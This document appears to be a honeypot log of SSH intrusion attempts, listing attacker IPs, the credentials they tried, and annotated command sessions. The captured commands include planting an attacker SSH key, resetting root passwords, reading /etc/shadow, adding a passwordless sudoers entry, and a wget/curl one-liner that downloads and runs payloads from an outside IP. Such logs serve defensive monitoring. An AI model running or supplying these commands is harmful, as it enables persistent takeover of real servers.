$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:zgAzPaywe80E"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 shadow_root_32 (200.77.172.159) — Cuauhtémoc, Mexico · 1 session · 2 cmds

2026-04-10 17:18 EDT · as oracle/Oracle23!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 star_root_10 (69.48.204.173) — Sulphur Springs, United States · 1 session · 20 cmds

2026-04-10 16:22 EDT · as oracle/oracle07!

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa..." → cat /proc/cpuinfo | grep name | wc -l → echo "oracle07!\nXVxP7U0VoZ8N\nXVxP7U0VoZ8N

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "oracle07!\nXVxP7U0VoZ8N\nXVxP7U0VoZ8N"|passwd|bash

$ Enter new UNIX password:

$ echo "oracle07!\nXVxP7U0VoZ8N\nXVxP7U0VoZ8N\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 panda_root_15 (115.190.210.230) — Beijing, China · 1 session · 1 cmd

2026-04-10 14:56 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 blitz_root_10 (46.225.73.18) — Nuremberg, Germany · 1 session · 1 cmd

2026-04-10 13:06 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 lantern_root_20 (39.102.148.6) — Beijing, China · 1 session · 1 cmd

2026-04-10 13:01 EDT · as oracle/Oracle123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 tulip_sol_4 (176.65.139.101) — Eygelshoven, The Netherlands · 35 sessions · 35 cmds

2026-04-10 10:01 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 ghost_root_35 (105.27.148.94) — Nairobi, Kenya · 1 session · 2 cmds

2026-04-10 07:11 EDT · as oracle/root

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_33 (103.218.241.179) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-10 07:04 EDT · as oracle/root

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 spice_root_3 (103.30.75.85) — Panvel, India · 5 sessions · 5 cmds

2026-04-10 04:13 EDT · as root/1234, root/123456, root/12345678

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon;echo Password123 |passwd daemon --stdin;mkdir ~/.ssh;chattr -ia ~/.ssh/* ~/.ssh;wget http://103.56.149.224/cacti/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;chmod 700 ~/ ~/.ssh;wget http://103.56.149.224/cacti/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;wget http://103.56.149.224/cacti/oto -O /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://103.56.149.224/cacti/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto ×5

↳ password hash extraction

🎭 burger_root_6 (148.72.152.253) — St Louis, United States · 1 session · 2 cmds

2026-04-10 03:38 EDT · as oracle/Oracle19!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cipher_root_55 (43.99.245.200) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-04-10 02:26 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 cowboy_root_12 (43.166.245.172) — Ashburn, United States · 1 session · 2 cmds

2026-04-09 22:53 EDT · as oracle/Oracle26!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_35 (186.122.177.140) — Buenos Aires, Argentina · 1 session · 2 cmds

2026-04-09 22:49 EDT · as oracle/oracle2025!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 monet_root (173.249.50.59) — Lauterbourg, France · 2 sessions · 21 cmds

2026-03-17 07:51 EDT · as oracle/Oracle26!, root/admin

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:LYwebJ5ADFb6"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 specter_root_17 (189.194.140.170) — Puebla City, Mexico · 2 sessions · 22 cmds

2026-04-09 21:49 EDT · as bitcoin/bitcoin, oracle/oracle123

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "bitcoin\n4Qnf2rdF3n2Y\n4Qnf2rdF3n2Y"|passwd|bash

$ Enter new UNIX password:

$ echo "bitcoin\n4Qnf2rdF3n2Y\n4Qnf2rdF3n2Y\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 fjord_root_2 (171.25.158.70) — Vaxjo, Sweden · 2 sessions · 22 cmds

2026-04-09 21:51 EDT · as bitcoin/bitcoin, oracle/oracle123

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "bitcoin\niy3mHoyDfUP1\niy3mHoyDfUP1"|passwd|bash

$ Enter new UNIX password:

$ echo "bitcoin\niy3mHoyDfUP1\niy3mHoyDfUP1\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 lotus_root_9 (34.0.13.61) — New Delhi, India · 1 session · 2 cmds

2026-04-09 19:45 EDT · as oracle/Oracle$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 tiger_root_5 (203.192.232.180) — Mumbai, India · 1 session · 2 cmds

2026-04-09 19:43 EDT · as oracle/Oracle$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 phantom_root_33 (102.88.137.213) — Lagos, Nigeria · 1 session · 2 cmds

2026-04-09 19:43 EDT · as oracle/Oracle$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 star_root_5 (162.223.91.130) — Buffalo, United States · 1 session · 2 cmds

2026-04-09 19:35 EDT · as oracle/Oracle$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 phantom_root_34 (103.82.92.202) — Padalarang, Indonesia · 1 session · 2 cmds

2026-04-09 19:31 EDT · as oracle/Oracle$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_root_45 (4.194.50.159) — Singapore, Singapore · 2 sessions · 2 cmds

2026-04-08 19:04 EDT · as admin/admin123, root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 rogue_sol (195.178.110.218) — Andorra la Vella, Andorra · 1057 sessions · 1057 cmds

2026-03-15 04:32 EDT · as firedancer/firedancer, raydium/raydium, sol/123

Ran uname 357x across 357 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×1057

↳ obfuscated system check

🎭 shadow_root_34 (157.230.42.251) — Singapore, Singapore · 1 session · 1 cmd

2026-04-09 16:55 EDT · as oracle/Oracle1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 panda_root_16 (125.39.11.27) — Tianjin, China · 6 sessions · 6 cmds

2026-04-09 15:09 EDT · as admin/admin, root/1234, root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon;echo Password123 |passwd daemon --stdin;mkdir ~/.ssh;chattr -ia ~/.ssh/* ~/.ssh;wget http://103.56.149.224/cacti/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;chmod 700 ~/ ~/.ssh;wget http://103.56.149.224/cacti/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;wget http://103.56.149.224/cacti/oto -O /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://103.56.149.224/cacti/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto ×6

↳ password hash extraction

🎭 ghost_root_61 (45.78.202.217) — Singapore, Singapore · 1 session · 18 cmds

2026-04-09 15:15 EDT · as oracle/Oracle20

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "Oracle20\nnzCwD1VW58LL\nnzCwD1VW58LL"|passwd|bash

$ Enter new UNIX password:

$ echo "Oracle20\nnzCwD1VW58LL\nnzCwD1VW58LL\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

🎭 rogue_root_36 (197.227.8.186) — Ebene CyberCity, Mauritius · 1 session · 2 cmds

2026-04-09 14:57 EDT · as oracle/Oracle20

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

